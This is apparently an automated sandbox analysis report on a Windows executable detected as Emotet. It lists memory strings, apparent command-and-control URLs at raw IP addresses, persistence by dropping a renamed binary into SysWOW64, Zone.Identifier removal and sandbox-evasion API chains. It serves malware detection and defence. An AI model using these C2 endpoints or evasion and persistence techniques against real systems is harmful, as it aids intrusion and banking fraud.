-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"Legac
Source: svchost.exe, 0000000C.00000003.449149844.0000017DE7DA0000.00000004.00000001.sdmp	String found in binary or memory: is absolutely free to play, you have the ability to unlock optional bonuses via in-app purchases from within the game. You may disable in-app purchases in your device settings.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"Legac
Source: svchost.exe, 0000000C.00000003.449149844.0000017DE7DA0000.00000004.00000001.sdmp	String found in binary or memory: is absolutely free to play, you have the ability to unlock optional bonuses via in-app purchases from within the game. You may disable in-app purchases in your device settings.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"Legac

Source: unknown

Source: dot3hc.exe, 00000003.00000002.617441030.00000000029E2000.00000004.00000001.sdmp	String found in binary or memory: http://142.44.137.67:443/DLgjaT02V4ZRh7a7A/wt8CBtC1NZfAQWkn/
Source: dot3hc.exe, 00000003.00000002.617441030.00000000029E2000.00000004.00000001.sdmp	String found in binary or memory: http://142.44.137.67:443/DLgjaT02V4ZRh7a7A/wt8CBtC1NZfAQWkn/T
Source: dot3hc.exe, 00000003.00000002.617493690.00000000029F9000.00000004.00000001.sdmp	String found in binary or memory: http://162.241.242.173:8080/nPONFQEvQO/m1R1pV6p0j201mdDM/V3kdX/
Source: dot3hc.exe, 00000003.00000002.617441030.00000000029E2000.00000004.00000001.sdmp	String found in binary or memory: http://192.158.216.73/bw3A8vOSwPk/MUmkPxxvia/gp9rmo9BY/Aiyozum4do0I2sb158h/TZEWfRpLT/CpHNbkWtxKNiePn
Source: dot3hc.exe, 00000003.00000002.617493690.00000000029F9000.00000004.00000001.sdmp	String found in binary or memory: http://78.24.219.147:8080/2VdcJgn3KtqNnFx/FoHxTH03XYaP/
Source: dot3hc.exe, 00000003.00000002.617441030.00000000029E2000.00000004.00000001.sdmp	String found in binary or memory: http://78.24.219.147:8080/2VdcJgn3KtqNnFx/FoHxTH03XYaP/t
Source: dot3hc.exe, 00000003.00000002.617441030.00000000029E2000.00000004.00000001.sdmp	String found in binary or memory: http://85.152.162.105/jIpQt16P2GWjQ5/wnzZKJ/DKZyC/
Source: svchost.exe, 0000000C.00000003.470057078.0000017DE7452000.00000004.00000001.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: svchost.exe, 0000000C.00000002.471659904.0000017DE7D75000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRoo
Source: svchost.exe, 0000000C.00000003.470057078.0000017DE7452000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: svchost.exe, 00000012.00000002.617508051.0000017D2F811000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: svchost.exe, 0000000C.00000003.470057078.0000017DE7452000.00000004.00000001.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: svchost.exe, 0000000C.00000003.470057078.0000017DE7452000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: svchost.exe, 00000012.00000002.617508051.0000017D2F811000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0:
Source: svchost.exe, 00000012.00000002.617508051.0000017D2F811000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.msocsp.com0
Source: svchost.exe, 00000012.00000002.616906100.0000017D2F6D0000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: svchost.exe, 0000000C.00000003.449149844.0000017DE7DA0000.00000004.00000001.sdmp	String found in binary or memory: http://www.g5e.com/G5_End_User_License_Supplemental_Terms
Source: svchost.exe, 0000000C.00000003.449149844.0000017DE7DA0000.00000004.00000001.sdmp	String found in binary or memory: http://www.g5e.com/termsofservice
Source: svchost.exe, 0000000C.00000003.457543774.0000017DE7DAB000.00000004.00000001.sdmp	String found in binary or memory: https://corp.roblox.com/contact/
Source: svchost.exe, 0000000C.00000003.457543774.0000017DE7DAB000.00000004.00000001.sdmp	String found in binary or memory: https://corp.roblox.com/parents/
Source: svchost.exe, 0000000C.00000003.457543774.0000017DE7DAB000.00000004.00000001.sdmp	String found in binary or memory: https://en.help.roblox.com/hc/en-us
Source: svchost.exe, 0000000C.00000003.449149844.0000017DE7DA0000.00000004.00000001.sdmp	String found in binary or memory: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure
Source: svchost.exe, 0000000C.00000003.457543774.0000017DE7DAB000.00000004.00000001.sdmp	String found in binary or memory: https://www.roblox.com/develop
Source: svchost.exe, 0000000C.00000003.457543774.0000017DE7DAB000.00000004.00000001.sdmp	String found in binary or memory: https://www.roblox.com/info/privacy
Source: svchost.exe, 0000000C.00000003.450618925.0000017DE7D9E000.00000004.00000001.sdmp	String found in binary or memory: https://www.tiktok.com/legal/report/feedback

Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443

Source: C:\Users\user\Desktop\NWMEaRqF7s.exe	Code function: 1_2_0040A094 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,		1_2_0040A094
Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe	Code function: 3_2_0040A094 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,		3_2_0040A094

E-Banking Fraud:

Yara detected Emotet

Show sources

Source: Yara match	File source: 1.2.NWMEaRqF7s.exe.5a052e.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.NWMEaRqF7s.exe.5a23ae.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.NWMEaRqF7s.exe.5a23ae.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.dot3hc.exe.22d052e.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.dot3hc.exe.22d052e.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.dot3hc.exe.22d23ae.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.dot3hc.exe.22d23ae.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.NWMEaRqF7s.exe.5a052e.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.347473341.0000000002244000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.347079722.00000000005A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.615027778.00000000022D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.615086404.00000000022E4000.00000004.00000001.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\NWMEaRqF7s.exe

File created: C:\Windows\SysWOW64\sqlcecompact40\

Jump to behavior

Source: C:\Users\user\Desktop\NWMEaRqF7s.exe

File deleted: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe:Zone.Identifier

Jump to behavior

Source: C:\Users\user\Desktop\NWMEaRqF7s.exe	Code function: 1_2_0042F078	1_2_0042F078
Source: C:\Users\user\Desktop\NWMEaRqF7s.exe	Code function: 1_2_00420268	1_2_00420268
Source: C:\Users\user\Desktop\NWMEaRqF7s.exe	Code function: 1_2_0042339B	1_2_0042339B
Source: C:\Users\user\Desktop\NWMEaRqF7s.exe	Code function: 1_2_0042C550	1_2_0042C550
Source: C:\Users\user\Desktop\NWMEaRqF7s.exe	Code function: 1_2_0042E5F4	1_2_0042E5F4
Source: C:\Users\user\Desktop\NWMEaRqF7s.exe	Code function: 1_2_00428640	1_2_00428640
Source: C:\Users\user\Desktop\NWMEaRqF7s.exe	Code function: 1_2_0042063C	1_2_0042063C
Source: C:\Users\user\Desktop\NWMEaRqF7s.exe	Code function: 1_2_0042F73C	1_2_0042F73C
Source: C:\Users\user\Desktop\NWMEaRqF7s.exe	Code function: 1_2_0041E780	1_2_0041E780
Source: C:\Users\user\Desktop\NWMEaRqF7s.exe	Code function: 1_2_0043084D	1_2_0043084D
Source: C:\Users\user\Desktop\NWMEaRqF7s.exe	Code function: 1_2_0040B8F6	1_2_0040B8F6
Source: C:\Users\user\Desktop\NWMEaRqF7s.exe	Code function: 1_2_00420A48	1_2_00420A48
Source: C:\Users\user\Desktop\NWMEaRqF7s.exe	Code function: 1_2_0042EB36	1_2_0042EB36
Source: C:\Users\user\Desktop\NWMEaRqF7s.exe	Code function: 1_2_00427C19	1_2_00427C19
Source: C:\Users\user\Desktop\NWMEaRqF7s.exe	Code function: 1_2_0041FD95	1_2_0041FD95
Source: C:\Users\user\Desktop\NWMEaRqF7s.exe	Code function: 1_2_00420E68	1_2_00420E68
Source: C:\Users\user\Desktop\NWMEaRqF7s.exe	Code function: 1_2_02252AEA	1_2_02252AEA
Source: C:\Users\user\Desktop\NWMEaRqF7s.exe	Code function: 1_2_02252C80	1_2_02252C80
Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe	Code function: 3_2_0042F078	3_2_0042F078
Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe	Code function: 3_2_00420268	3_2_00420268
Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe	Code function: 3_2_0042339B	3_2_0042339B
Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe	Code function: 3_2_0042C550	3_2_0042C550
Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe	Code function: 3_2_0042E5F4	3_2_0042E5F4
Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe	Code function: 3_2_00428640	3_2_00428640
Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe	Code function: 3_2_0042063C	3_2_0042063C
Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe	Code function: 3_2_0042F73C	3_2_0042F73C
Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe	Code function: 3_2_0041E780	3_2_0041E780
Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe	Code function: 3_2_0043084D	3_2_0043084D
Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe	Code function: 3_2_0040B8F6	3_2_0040B8F6
Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe	Code function: 3_2_00420A48	3_2_00420A48
Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe	Code function: 3_2_0042EB36	3_2_0042EB36
Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe	Code function: 3_2_00427C19	3_2_00427C19
Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe	Code function: 3_2_0041FD95	3_2_0041FD95
Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe	Code function: 3_2_00420E68	3_2_00420E68
Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe	Code function: 3_2_02302AEA	3_2_02302AEA
Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe	Code function: 3_2_02302C80	3_2_02302C80
Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe	Code function: 3_2_022D4298	3_2_022D4298
Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe	Code function: 3_2_022D442E	3_2_022D442E

Source: C:\Users\user\Desktop\NWMEaRqF7s.exe	Code function: String function: 004036EF appears 33 times
Source: C:\Users\user\Desktop\NWMEaRqF7s.exe	Code function: String function: 0041F71D appears 39 times
Source: C:\Users\user\Desktop\NWMEaRqF7s.exe	Code function: String function: 0041F6EA appears 140 times
Source: C:\Users\user\Desktop\NWMEaRqF7s.exe	Code function: String function: 00421418 appears 52 times
Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe	Code function: String function: 004036EF appears 33 times
Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe	Code function: String function: 0041F71D appears 39 times
Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe	Code function: String function: 0041F6EA appears 140 times
Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe	Code function: String function: 00421418 appears 52 times

Source: NWMEaRqF7s.exe

Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: NWMEaRqF7s.exe, 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenamecmdcmxcfg.exe. vs NWMEaRqF7s.exe
Source: NWMEaRqF7s.exe, 00000001.00000002.348521498.0000000002E30000.00000002.00000001.sdmp	Binary or memory string: System.OriginalFileName vs NWMEaRqF7s.exe
Source: NWMEaRqF7s.exe, 00000001.00000002.348726962.0000000002F20000.00000002.00000001.sdmp	Binary or memory string: originalfilename vs NWMEaRqF7s.exe
Source: NWMEaRqF7s.exe, 00000001.00000002.348726962.0000000002F20000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs NWMEaRqF7s.exe
Source: NWMEaRqF7s.exe	Binary or memory string: OriginalFilenamecmdcmxcfg.exe. vs NWMEaRqF7s.exe

Source: NWMEaRqF7s.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED

Source: classification engine

Classification label: mal88.troj.evad.winEXE@8/4@0/88

Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe

Code function: 3_2_02303686 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,FindCloseChangeNotification,

3_2_02303686

Source: C:\Users\user\Desktop\NWMEaRqF7s.exe

Code function: 1_2_0040638F __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z,__EH_prolog3_catch,FindResourceA,LoadResource,LockResource,GetDesktopWindow,IsWindowEnabled,EnableWindow,EnableWindow,GetActiveWindow,SetActiveWindow,FreeResource,

1_2_0040638F

Source: C:\Users\user\Desktop\NWMEaRqF7s.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Crypto

Jump to behavior

Source: NWMEaRqF7s.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\NWMEaRqF7s.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\NWMEaRqF7s.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: NWMEaRqF7s.exe	Virustotal: Detection: 84%
Source: NWMEaRqF7s.exe	Metadefender: Detection: 68%
Source: NWMEaRqF7s.exe	ReversingLabs: Detection: 92%

Source: unknown	Process created: C:\Users\user\Desktop\NWMEaRqF7s.exe 'C:\Users\user\Desktop\NWMEaRqF7s.exe'
Source: C:\Users\user\Desktop\NWMEaRqF7s.exe	Process created: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Users\user\Desktop\NWMEaRqF7s.exe	Process created: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe	Jump to behavior

Source: C:\Users\user\Desktop\NWMEaRqF7s.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\NWMEaRqF7s.exe

Window detected: Number of UI elements: 11

Source: C:\Users\user\Desktop\NWMEaRqF7s.exe

Code function: 1_2_00401D20 LoadLibraryW,GetProcAddress,

1_2_00401D20

Source: NWMEaRqF7s.exe

Static PE information: real checksum: 0x5d872 should be: 0x5cbf3

Source: C:\Users\user\Desktop\NWMEaRqF7s.exe	Code function: 1_2_0042145D push ecx; ret	1_2_00421470
Source: C:\Users\user\Desktop\NWMEaRqF7s.exe	Code function: 1_2_0041B69C push 59FFFE78h; ret	1_2_0041B6A5
Source: C:\Users\user\Desktop\NWMEaRqF7s.exe	Code function: 1_2_0041F7C2 push ecx; ret	1_2_0041F7D5
Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe	Code function: 3_2_0042145D push ecx; ret	3_2_00421470
Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe	Code function: 3_2_0041B69C push 59FFFE78h; ret	3_2_0041B6A5
Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe	Code function: 3_2_0041F7C2 push ecx; ret	3_2_0041F7D5
Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe	Code function: 3_2_022D974C push edx; ret	3_2_022D9761

Persistence and Installation Behavior:

Drops executables to the windows directory (C:\Windows) and starts them

Show sources

Source: C:\Users\user\Desktop\NWMEaRqF7s.exe

Executable created and started: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe

Jump to behavior

Source: C:\Users\user\Desktop\NWMEaRqF7s.exe

PE file moved: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe

Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Users\user\Desktop\NWMEaRqF7s.exe

File opened: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe:Zone.Identifier read attributes | delete

Jump to behavior

Source: C:\Users\user\Desktop\NWMEaRqF7s.exe	Code function: 1_2_00402130 IsIconic,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,	1_2_00402130
Source: C:\Users\user\Desktop\NWMEaRqF7s.exe	Code function: 1_2_004078B8 IsIconic,GetWindowPlacement,GetWindowRect,	1_2_004078B8
Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe	Code function: 3_2_00402130 IsIconic,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,	3_2_00402130
Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe	Code function: 3_2_004078B8 IsIconic,GetWindowPlacement,GetWindowRect,	3_2_004078B8

Source: C:\Users\user\Desktop\NWMEaRqF7s.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NWMEaRqF7s.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NWMEaRqF7s.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Show sources

Source: C:\Users\user\Desktop\NWMEaRqF7s.exe

Evasive API call chain: GetPEB, DecisionNodes, ExitProcess

graph_1-31467

Source: C:\Users\user\Desktop\NWMEaRqF7s.exe

API coverage: 9.2 %

Source: C:\Windows\System32\svchost.exe TID: 5976	Thread sleep time: -150000s >= -30000s			Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 5976	Thread sleep time: -30000s >= -30000s			Jump to behavior

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Source: C:\Users\user\Desktop\NWMEaRqF7s.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\Desktop\NWMEaRqF7s.exe	Code function: 1_2_00410555 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,	1_2_00410555
Source: C:\Users\user\Desktop\NWMEaRqF7s.exe	Code function: 1_2_022528FB FindFirstFileW,FindNextFileW,FindClose,	1_2_022528FB
Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe	Code function: 3_2_00410555 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,	3_2_00410555
Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe	Code function: 3_2_023028FB FindFirstFileW,FindNextFileW,FindClose,	3_2_023028FB

Source: C:\Users\user\Desktop\NWMEaRqF7s.exe

Code function: 1_2_0041E654 VirtualQuery,GetSystemInfo,__invoke_watson,GetModuleHandleA,GetProcAddress,VirtualAlloc,VirtualProtect,

1_2_0041E654

Source: svchost.exe, 00000012.00000002.614751987.0000017D2A02A000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW ?
Source: dot3hc.exe, 00000003.00000002.617441030.00000000029E2000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW(Yd%SystemRoot%\system32\mswsock.dll~y
Source: svchost.exe, 00000005.00000002.373440622.00000241EBF40000.00000002.00000001.sdmp, svchost.exe, 00000007.00000002.419273377.000001BBD3940000.00000002.00000001.sdmp, svchost.exe, 0000000A.00000002.436429626.0000023111660000.00000002.00000001.sdmp, svchost.exe, 0000000C.00000002.472258673.0000017DE8400000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: svchost.exe, 00000012.00000002.617796585.0000017D2F863000.00000004.00000001.sdmp	Binary or memory string: @Hyper-V RAW
Source: dot3hc.exe, 00000003.00000003.435481620.00000000029F9000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.470057078.0000017DE7452000.00000004.00000001.sdmp, svchost.exe, 00000012.00000002.617740212.0000017D2F857000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: svchost.exe, 00000005.00000002.373440622.00000241EBF40000.00000002.00000001.sdmp, svchost.exe, 00000007.00000002.419273377.000001BBD3940000.00000002.00000001.sdmp, svchost.exe, 0000000A.00000002.436429626.0000023111660000.00000002.00000001.sdmp, svchost.exe, 0000000C.00000002.472258673.0000017DE8400000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
